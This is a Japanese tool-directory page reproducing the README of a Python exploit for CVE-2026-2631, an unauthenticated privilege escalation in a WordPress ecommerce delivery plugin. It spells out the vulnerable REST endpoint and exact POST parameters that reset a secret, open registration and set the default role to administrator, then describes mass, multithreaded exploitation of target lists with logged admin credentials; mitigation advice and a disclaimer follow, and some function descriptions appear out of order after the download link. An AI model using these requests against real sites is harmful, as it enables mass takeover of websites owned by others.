Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-2631 — Datalogics Ecommerce Delivery – Datalogics < 2.6.60 - 未認証の権限昇格 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2026-2631
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubnxploited/cve-2026-2631

CVE-2026-2631

Datalogics Ecommerce Delivery – Datalogics < 2.6.60 - 未認証の権限昇格

リポジトリを見る
35ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-2631

Datalogics Ecommerce Delivery – Datalogics < 2.6.60 - 未認証の権限昇格

💥 CVE-2026-2631 – Datalogics Ecommerce Delivery (WordPress) – 未認証の権限昇格

PoC / エクスプロイトスクリプト: CVE-2026-2631.py
著者: Khaled Alenazi (Nxploited) – Nxploited ZeroDay Hub
連絡先: Telegram: @Kxploit


🧬 脆弱性の概要

  • プラグイン: Datalogics Ecommerce Delivery – Datalogics (WordPress)
  • 影響を受けるバージョン: < 2.6.60(2.6.60 未満)
  • 脆弱性タイプ: 未認証の権限昇格
  • CVE: CVE-2026-2631
  • CVSS v3.1: 9.8 (Critical)
    AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 公開日: 2026年3月12日
  • 最終更新日: 2026年3月19日
  • 研究者: Khaled Alenazi (Nxploited)

Datalogics Ecommerce Delivery – Datalogics プラグインは、認証なしでアクセス可能なエンドポイントを公開しています:

root@kitploit:~
/wp-json/gsf/v1/update-options

このスクリプトはそのエンドポイントを悪用して、次のことを行います:

  1. 💣 脆弱な resetStoreConfigrations アクションを使用して内部の shop_secret キーをリセットします。
  2. 🔓 ユーザー登録を有効化:users_can_register = 1。
  3. 👑 新しいユーザーのデフォルトロールを administrator に設定:default_role = administrator。
  4. 🧑‍💻 WordPress の登録フォームを介して新しいユーザーを自動登録:
    • wp-login.php?action=register

成功した場合、登録フォームを通じて作成された新しいユーザーは administrator になります。


⚙️ 機能

  • ✅ 複数のWordPressターゲットに対する一括エクスプロイト(ファイルから)。
  • ✅ 認証不要(ログイン/クッキー不要)。
  • ✅ 脆弱なRESTエンドポイントを介したshop_secretの自動リセット。
  • ✅ WordPressオプションの自動更新:
    • users_can_register = 1
    • default_role = administrator
  • ✅ カスタム認証情報による自動アカウント登録。
  • ✅ rich を使用したリッチなTUI出力(色付き・ライブ更新テーブル)。
  • ✅ マルチスレッド(スレッド数調整可能)。
  • ✅ Login_admin.txt への結果ログ記録。

📦 必要条件

🐍 ランタイム

  • Python 3.x(推奨 3.8 以上)

📚 Pythonパッケージ

必要なパッケージをインストール:

root@kitploit:~
pip install -r requirements.txt

requirements.txt の例:

root@kitploit:~
requests
rich
urllib3

または手動でインストール:

root@kitploit:~
pip install requests rich urllib3

🧪 スクリプトのロジック(高レベルのフロー)

各ターゲットに対して:

  1. URLを正規化

    • 欠落している場合は http:// を先頭に追加。
    • 末尾のスラッシュを削除。
  2. shop_secret をリセット

    • エンドポイント:
      /wp-json/gsf/v1/update-options
    • POSTデータ:
      • action = resetStoreConfigrations
      • shop_secret = <new_secret>
    • レスポンステキストを確認:
      • app secret key has been updated successfully
  3. WordPressオプションを更新

    • 同じエンドポイントで、以下を使用:
      • action = createUpdateOption
    • 2つのオプション更新:
      1. option_key = users_can_register、option_value = 1
      2. option_key = default_role、option_value = administrator

🧵 マルチスレッドモデル

  • list.txt(またはカスタムファイル)からすべてのターゲットを読み込みます。
  • chunkify を使用してターゲットを N 個のチャンクに分割します。
  • N 個のワーカースレッドを起動し、各スレッドが自身のターゲットリストを処理します。
  • プリンタスレッドへのステータスメッセージに共有 Queue を使用します。
  • 専用のプリンタスレッド(printer_loop)がライブの rich テーブルを更新します:
    • インデックス、サイト、ステータス(SUCCESS/FAILED/ERROR)、詳細を表示。
    • 処理済みの合計数と出力ファイル名を表示。

🚀 使用方法

1️⃣ 基本的な実行

root@kitploit:~
python3 CVE-2026-2631.py

対話形式で次の入力を求められます:

  1. ターゲットファイル

    • プロンプト: Targets file (one host/URL per line) [list.txt]:
    • デフォルト: list.txt
    • 各行: ドメインまたは完全なURL
      • 例:
        • victim.com
        • https://target-site.com
        • http://example.org/blog
  2. スレッド数

    • プロンプト: Threads (1-50) [10]:
    • デフォルト: 10
    • 最大: 50
      スレッドが多いほど高速ですが、システムとターゲットへの負荷が高くなります。
  3. shop_secret の値

    • プロンプト: shop_secret [Nxploited_newSecret]:
    • デフォルト: Nxploited_newSecret
      これは resetStoreConfigrations に送信される新しいシークレットキーです。

これらの認証情報は、各脆弱なターゲットへの登録試行に使用されます。


2️⃣ ターゲットファイルの形式

list.txt(または任意のファイル)を1行に1ターゲットずつ作成します:

root@kitploit:~
example1.com
http://example2.com
https://shop.example3.net
blog.target-site.org

スクリプトは次のことを行います:

  • 欠落している場合は http:// を自動追加。
  • 末尾の / を削除。

3️⃣ 出力と結果

  • すべての成功した操作(ユーザー登録が失敗してもオプションが設定されていれば)は、次のファイルに書き込まれます:

    Login_admin.txt

  • 典型的な行:

    root@kitploit:~
    http://example1.com | register_url: http://example1.com/wp-login.php?action=register | shop_secret: Nxploited_newSecret | reset_ok,option_ok,option_ok,register_open,registered user=Nx_test1 [email protected] pass=Nx_adminSA
    
  • ライブテーブルでのステータスの例:

    • ✅ SUCCESS – オプションが設定された、および/またはユーザーが登録された。
    • ❌ FAILED – リセット/オプションが失敗、脆弱性を悪用できない。
    • ⚠️ ERROR – 例外、ネットワークエラー、タイムアウトなど。

🧱 HTTPエンドポイントとパラメータ

🔓 脆弱なRESTエンドポイント

root@kitploit:~
POST /wp-json/gsf/v1/update-options

1. shop_secret をリセット

root@kitploit:~
action=resetStoreConfigrations
shop_secret=<new_secret>

2. オプションを更新

root@kitploit:~
action=createUpdateOption
shop_secret=<new_secret>
option_key=users_can_register
option_value=1
root@kitploit:~
action=createUpdateOption
shop_secret=<new_secret>
option_key=default_role
option_value=administrator

🧑‍💻 登録エンドポイント

root@kitploit:~
GET/POST /wp-login.php?action=register

スクリプトは:

  • 存在する場合 _wpnonce を抽出します。
  • 提供されたユーザー名、メールアドレス、パスワード(フィールドが存在する場合)で登録データを送信します。

🔧 スクリプト内部(主要関数)

  • normalize_site(raw: str) -> str
    ターゲットURLを正規化します。

  • send_reset_secret(site: str, secret: str, timeout: int = 10) -> (bool, str)
    resetStoreConfigrations アクションを試行します。

  • send_option(site: str, secret: str, key: str, value: str, timeout: int = 10) -> (bool, str)
    脆弱なエンドポイントを介してWordPressオプションを設定します。

  • check_registration_open(site: str, timeout: int = 10) -> (bool, str)
    登録が有効でフォームにアクセス可能かどうかを確認します。

  • try_register_user(...) -> (bool, str)
    指定されたユーザーの登録を試行します。

  • write_success_line(site: str, secret: str, detail: str)
    成功の詳細を Login_admin.txt にログ記録します。

  • worker(...)
    スレッドごとのワーカーで、以下を実行:

    1. shop_secret をリセット

🧪 実行例(対話形式)

root@kitploit:~
$ python3 CVE-2026-2631.py

[Banner / ASCII Art]

Targets file (one host/URL per line) [list.txt]:
> list.txt

Threads (1-50) [10]:
> 20

shop_secret [Nxploited_newSecret]:
> NxSecret2026!

Registration username [Nx_test1]:
> admin_nx

Registration email [[email protected]]:
> [email protected]

Registration password [Nx_adminSA]:
> SuperStrongP@ss!

[Live table starts showing each target’s status]
Processed 5/20 targets · Output: Login_admin.txt

Done. Successful sites (if any) saved to Login_admin.txt.

🛡️ 対策と推奨事項

防御担当者 / サイト運営者向け:

  • 🔁 **プラグインを直ちにバージョン 2.6.60 以降 に更新してください。
  • 🧹 以下を確認:
    • 不明な管理者がいないかWordPressユーザー一覧。
    • wp_users の最近の登録。
  • 🔑 プラグインが使用するシークレットやキーを再生成します。
  • 📜 アクセスログで以下へのアクセスを検査:
    • /wp-json/gsf/v1/update-options
    • /wp-login.php?action=register
  • 🧱 機密性の高いRESTエンドポイントへの不正アクセスをブロックするWAFルールを検討してください。

⚠️ 法的免責事項

このスクリプトは、教育および許可されたセキュリティテストの目的でのみ提供されます。

  • 所有者から明示的な書面による許可を得ずに、このツールをいかなるシステム、アプリケーション、ネットワークにも使用してはなりません。
  • 不正アクセス、脆弱性の悪用、乱用は違法であり、刑事責任を問われる可能性があります。
  • 本スクリプトの作者(Khaled Alenazi – Nxploited)、貢献者、および配布者は:
    • 以下について一切の責任または義務を負いません:
      • このコードの誤用
      • 直接的または間接的に引き起こされた損害
      • 使用によって生じる法的結果
  • 本スクリプトを使用することにより、あなたは同意したものとみなされます:
    • あなたの行動に対して単独で責任を負うこと。
    • 適用されるすべての現地法、国内法、国際法および規制を遵守すること。
    • このツールを管理された環境および/または適切な許可(PT/レッドチーム、バグバウンティ、ラボなど)の下でのみ使用すること。

これらの条件に同意できない場合は、このスクリプトを使用しないでください。


❤️ クレジット

  • 研究 & エクスプロイト:
    • Khaled Alenazi (Nxploited) – Nxploited ZeroDay Hub
  • CVE: CVE-2026-2631
  • 連絡先: Telegram で @Kxploit

安全に、責任を持ってハッキングしてください。🕶️💻

ツールをダウンロード
  • 成功パターン:
    • wordpress option has been created or updated successfully
  • 登録が有効かどうかを確認

    • URL:
      /wp-login.php?action=register
    • HTMLで以下を確認:
      • Users can register、Anyone can register、user_registration、registerform
    • または明示的なメッセージを検出:
      • user registration is currently not allowed
  • ユーザー登録を試行

    • 同じ登録URLを使用。
    • 存在する場合は、隠し入力から _wpnonce を抽出。
    • 登録POSTを送信:
      • user_login、user_email
      • パスワードフィールドが存在する場合は user_pass/user_pass2
      • _wpnonce、_wp_http_referer、redirect_to、wp-submit=Register
    • 成功を次のキーワードで検出:
      • registration complete、check your email、user registered
    • ユーザー名が既に存在する場合:
      • 成功としてマーク: user_already_exists
  • ログ記録

    • オプション更新が成功するたびに(登録の成功・失敗を問わず)、次のファイルに行を書き込み:
      • Login_admin.txt
    • 形式:
      root@kitploit:~
      <site> | register_url: <url> | shop_secret: <secret> | <details>
      
  • 登録用の認証情報

    • Registration username [Nx_test1]:
    • Registration email [[email protected]]:
    • Registration password [Nx_adminSA]:
  • オプションを設定
  • 登録を確認
  • 登録を試行
  • 結果をログに記録し、ステータスをキューにプッシュ
  • printer_loop(queue: Queue, total: int)
    キューからメッセージを読み取り、rich のライブテーブルUIを更新します。

  • main()
    以下を統括します:

    • バナー
    • ユーザープロンプト
    • ターゲットの読み込み
    • スレッドの起動
    • ジョインと最終メッセージ